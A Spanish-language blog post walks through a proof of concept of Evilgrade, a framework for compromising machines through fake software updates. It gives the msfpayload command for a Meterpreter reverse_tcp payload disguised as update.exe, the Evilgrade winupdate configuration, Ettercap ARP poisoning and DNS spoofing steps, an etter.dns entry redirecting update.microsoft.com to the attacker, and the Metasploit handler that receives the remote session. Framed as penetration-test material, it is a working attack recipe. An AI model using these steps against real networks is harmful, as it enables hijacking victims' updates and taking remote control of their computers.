Testing Evilgrade; PoC

TEG, PoC, BloG - 2

TEG, PoC, BloG - 3
Captura 1: Evilgrade (Github) };)

Evilgrade, un –framework– para comprometer equipos en un <test de intrusión> a través de actualizaciones no legítimas. Cuenta con una amplia variedad de módulos, como “Ccleaner“, <Quicktime>, “Java“, <Winamp>, “Virtualbox“, <Vmware>, etc.

Para comenzar con la <Poc>, necesitaremos –Metasploit-, <Ettercap> y por su puesto –Evilgrade-. Lo primero que haremos es crear el “payload malicioso“, esto será el ejecutable de la actualización falsa -;

TEG, PoC, BloG - 4
Captura 2: Creación del <Payload> 🙂

En este caso sería -;

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.134 LPORT=4444 X > /root/update.exe

Ahora es turno de –Evilgrade-, elegimos el <modulo>, yo me decante por las actualizaciones de Windows..;

config winupdate

TEG, PoC, BloG - 5
Captura 2Elección Modulo <Evilgrade> }:P

A continuación, abrimos “Ettercap” y elegimos la –interfaz de red-;

TEG, PoC, BloG - 6
Captura 3: Interfaz de red 😉

Procedemos a “escanear la red” y -listar los <host>- que se van a <spoofear>, el “target 1” será la –puerta de enlace– y el “target 2” la <maquina víctima>, a continuación nos situamos en la pestaña –Mitm– y hacer “clic” en –Arp poisoning-;

TEG, PoC, BloG - 7
Captura 4Configuración Ettercap }:D

Para terminar con <Ettercap> –activamos– el “plugin dns spoof” -;

TEG, PoC, BloG - 8
Captura 5Plugin dns spoof 🙂

Ahora volvemos a –Evilgrade– y especificamos la “ruta” del <payload> que creamos anteriormente -;

set agent /root/update.exe

start

TEG, PoC, BloG - 9
Captura 6Identificar <agent> 😉

Ahora podemos “probar el ataque“, para ello lanzamos <start> en –Evilgrade y Ettercap-, por otro lado igualmente dejamos listo <Metasploit>, para ello vamos a dejar a la escucha;

msfcli exploit/multi/handler/ PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 E

TEG, PoC, BloG - 10
Captura 7: Windows Update }:)

A continuación vamos a la <maquina víctima> y –actualizamos– “Windows” -;

TEG, PoC, BloG - 11
Captura 8Descarga Payload Malicioso }:P

Como podéis observar, nos descargamos el <update.exe> -;

TEG, PoC, BloG - 12
Captura 9SesiónOK– <Meterpreter> 😉

Como habéis visto, nos descargamos el <update.exe> y el –atacante– observará una bonita sesiónOK” de <Meterpreter> y partir de ahí…

Nota I: El archivo <etter.dns> de vuestra maquina debe estar definido en –ip local– con la “web” a <spoofear>, por ejemplo -;

192.168.1.134 A update.microsoft.com

Salu2


TonyHAT - 461

Anuncios

Responder

Por favor, inicia sesión con uno de estos métodos para publicar tu comentario:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s